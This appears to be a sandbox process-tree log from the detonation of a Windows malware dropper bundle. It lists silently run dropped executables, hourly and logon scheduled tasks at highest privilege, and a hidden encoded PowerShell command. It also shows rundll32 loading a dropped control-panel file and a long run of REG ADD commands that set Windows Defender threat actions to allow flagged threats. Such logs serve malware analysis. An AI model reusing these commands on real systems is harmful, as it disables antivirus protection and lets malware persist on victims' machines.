C:\Users\Admin\AppData\Local\43d725dd-1a81-4ebc-a1be-6b679653b93c\build2.exe
"C:\Users\Admin\AppData\Local\43d725dd-1a81-4ebc-a1be-6b679653b93c\build2.exe"
7⤵
PID:3644

C:\Users\Admin\AppData\Local\43d725dd-1a81-4ebc-a1be-6b679653b93c\build2.exe
"C:\Users\Admin\AppData\Local\43d725dd-1a81-4ebc-a1be-6b679653b93c\build2.exe"
8⤵
PID:2552

C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\setup331.exe.exe"
3⤵
- Executes dropped EXE
PID:3208

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\5VNCVdQR.CPl",
4⤵
PID:4344

C:\Users\Admin\Pictures\Adobe Films\AdblockInstaller.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\AdblockInstaller.exe.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
3⤵
- Executes dropped EXE
PID:1756

C:\Users\Admin\AppData\Local\Temp\is-G6B83.tmp\AdblockInstaller.exe.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G6B83.tmp\AdblockInstaller.exe.tmp" /SL5="$101F4,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\AdblockInstaller.exe.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
4⤵
PID:676

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe
5⤵
- Kills process with taskkill
PID:4888

C:\Users\Admin\Programs\Adblock\Adblock.exe
"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=b975079f1659626341 --downloadDate=2022-08-04T15:18:52 --distId=marketator --pid=747
5⤵
PID:4512

C:\Users\Admin\Programs\Adblock\crashpad_handler.exe
C:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\d4d7c001-7dc4-4fd9-b139-2e0b17bf28e4.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\d4d7c001-7dc4-4fd9-b139-2e0b17bf28e4.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\d4d7c001-7dc4-4fd9-b139-2e0b17bf28e4.run\__sentry-breadcrumb2" --initial-client-data=0x458,0x45c,0x460,0x434,0x464,0x7ff700afbc80,0x7ff700afbca0,0x7ff700afbcb8
6⤵
PID:4840

C:\Windows\system32\netsh.exe
C:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE
6⤵
- Modifies Windows Firewall
PID:1512

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe -install
6⤵
PID:5600

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe -start
6⤵
PID:5300

C:\Windows\system32\cmd.exe
"cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"
5⤵
PID:3108

C:\Windows\system32\reg.exe
reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f
6⤵
PID:5144

C:\Windows\system32\cmd.exe
"cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"
5⤵
PID:5632

C:\Windows\system32\reg.exe
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f
6⤵
- Modifies registry key
PID:3460

C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"
3⤵
- Executes dropped EXE
PID:4224

C:\Users\Admin\AppData\Local\Temp\is-U69DI.tmp\B2BCH2.exe.tmp
"C:\Users\Admin\AppData\Local\Temp\is-U69DI.tmp\B2BCH2.exe.tmp" /SL5="$101EE,254182,170496,C:\Users\Admin\Pictures\Adobe Films\B2BCH2.exe.exe"
4⤵
PID:2804

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
2⤵
- Creates scheduled task(s)
PID:4060

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
2⤵
- Creates scheduled task(s)
PID:2292

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 444 -p 2732 -ip 2732
1⤵
PID:4200

C:\Users\Admin\AppData\Local\Temp\is-NMAKE.tmp\djkdj778_______.exe
"C:\Users\Admin\AppData\Local\Temp\is-NMAKE.tmp\djkdj778_______.exe" /S /UID=91
1⤵
PID:4364

C:\Users\Admin\AppData\Local\Temp\cc-bf3a1-a8d-f2583-dc45ce029a252\Gegemutaeno.exe
"C:\Users\Admin\AppData\Local\Temp\cc-bf3a1-a8d-f2583-dc45ce029a252\Gegemutaeno.exe"
2⤵
PID:4696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
3⤵
PID:5288

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff99ed646f8,0x7ff99ed64708,0x7ff99ed64718
4⤵
PID:5316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2224 /prefetch:2
4⤵
PID:6040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2708 /prefetch:8
4⤵
PID:6068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 /prefetch:3
4⤵
PID:6060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
4⤵
PID:808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
4⤵
PID:2720

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4920 /prefetch:8
4⤵
PID:6024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:1
4⤵
PID:5500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
4⤵
PID:5728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5884 /prefetch:8
4⤵
PID:5524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
4⤵
PID:904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5876 /prefetch:8
4⤵
PID:528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6188 /prefetch:8
4⤵
PID:704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6464 /prefetch:1
4⤵
PID:5648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
4⤵
PID:3896

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6008 /prefetch:8
4⤵
PID:1836

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
4⤵
PID:3192

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x25c,0x260,0x264,0x238,0x268,0x7ff755575460,0x7ff755575470,0x7ff755575480
5⤵
PID:704

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,17359478404356597594,13710420389571144845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6008 /prefetch:8
4⤵
PID:3312

C:\Users\Admin\AppData\Local\Temp\6a-e36ea-6f9-1168a-94ec29d8edbb4\Hidypenati.exe
"C:\Users\Admin\AppData\Local\Temp\6a-e36ea-6f9-1168a-94ec29d8edbb4\Hidypenati.exe"
2⤵
PID:372

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x2fkz0zx.ih5\gcleaner.exe /mixfive & exit
3⤵
PID:5792

C:\Users\Admin\AppData\Local\Temp\x2fkz0zx.ih5\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\x2fkz0zx.ih5\gcleaner.exe /mixfive
4⤵
PID:5676

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\x2fkz0zx.ih5\gcleaner.exe" & exit
5⤵
PID:5632

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "gcleaner.exe" /f
6⤵
- Kills process with taskkill
PID:5656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 1464
5⤵
- Program crash
PID:4872

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cy2gl04a.xrx\random.exe & exit
3⤵
PID:5208

C:\Users\Admin\AppData\Local\Temp\cy2gl04a.xrx\random.exe
C:\Users\Admin\AppData\Local\Temp\cy2gl04a.xrx\random.exe
4⤵
PID:5668

C:\Users\Admin\AppData\Local\Temp\cy2gl04a.xrx\random.exe
"C:\Users\Admin\AppData\Local\Temp\cy2gl04a.xrx\random.exe" -hq
5⤵
PID:1788

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mqfrz2yg.xud\toolspab3.exe & exit
3⤵
PID:5336

C:\Users\Admin\AppData\Local\Temp\mqfrz2yg.xud\toolspab3.exe
C:\Users\Admin\AppData\Local\Temp\mqfrz2yg.xud\toolspab3.exe
4⤵
PID:5600

C:\Users\Admin\AppData\Local\Temp\mqfrz2yg.xud\toolspab3.exe
C:\Users\Admin\AppData\Local\Temp\mqfrz2yg.xud\toolspab3.exe
5⤵
PID:4672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dn2f55qz.mui\rmaa1045.exe & exit
3⤵
PID:5712

C:\Users\Admin\AppData\Local\Temp\dn2f55qz.mui\rmaa1045.exe
C:\Users\Admin\AppData\Local\Temp\dn2f55qz.mui\rmaa1045.exe
4⤵
PID:2072

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2072 -s 840
5⤵
- Program crash
PID:2328

C:\Program Files\Windows Portable Devices\NKXMSEOFDD\poweroff.exe
"C:\Program Files\Windows Portable Devices\NKXMSEOFDD\poweroff.exe" /VERYSILENT
2⤵
PID:4540

C:\Users\Admin\AppData\Local\Temp\is-MS0F5.tmp\poweroff.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MS0F5.tmp\poweroff.tmp" /SL5="$301E6,490199,350720,C:\Program Files\Windows Portable Devices\NKXMSEOFDD\poweroff.exe" /VERYSILENT
3⤵
PID:2100

C:\Program Files (x86)\powerOff\Power Off.exe
"C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu
4⤵
PID:1136

C:\Windows\SysWOW64\cmd.exe
cmd
1⤵
PID:1840

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
2⤵
- Enumerates processes with tasklist
PID:2604

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
2⤵
PID:4564

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^fbpXyeUvKokpHuiTLJQCMdBrjOglErOlAahxaNiKQXgzzuRkquHkiUUZVuLsNJRGzwJfSNBYBuMPeoJyXrlbcCrFbgnkwQWuyHZavCajEJJqotWNbFzJnxkRXtRE$" Mia.vst
2⤵
PID:1880

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Voglio.exe.pif
Voglio.exe.pif D
2⤵
PID:2000

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\5VNCVdQR.CPl",
1⤵
PID:1488

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\5VNCVdQR.CPl",
2⤵
PID:5348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4048 -ip 4048
1⤵
PID:1600

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:2388

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\5VNCVdQR.CPl",
1⤵
PID:5492

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3452

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe
1⤵
PID:5208

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5676 -ip 5676
1⤵
PID:5656

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 524 -p 2072 -ip 2072
1⤵
PID:616

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
1⤵
- Process spawned unexpected child process
PID:2272

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
2⤵
PID:1836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 600
3⤵
- Program crash
PID:724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1836 -ip 1836
1⤵
PID:5704

C:\Users\Admin\AppData\Local\Temp\BInNSjlobDuvYZgQA\dWABRBnWrovPiXF\BSPprLq.exe
C:\Users\Admin\AppData\Local\Temp\BInNSjlobDuvYZgQA\dWABRBnWrovPiXF\BSPprLq.exe Yz /site_id 525403 /S
1⤵
PID:5564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:532

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:476

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:5284

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:3440

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:5984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:2128

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:1732

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:3868

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:3120

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:3276

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:744

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:2420

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:5824

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:4104

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:5984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:2128

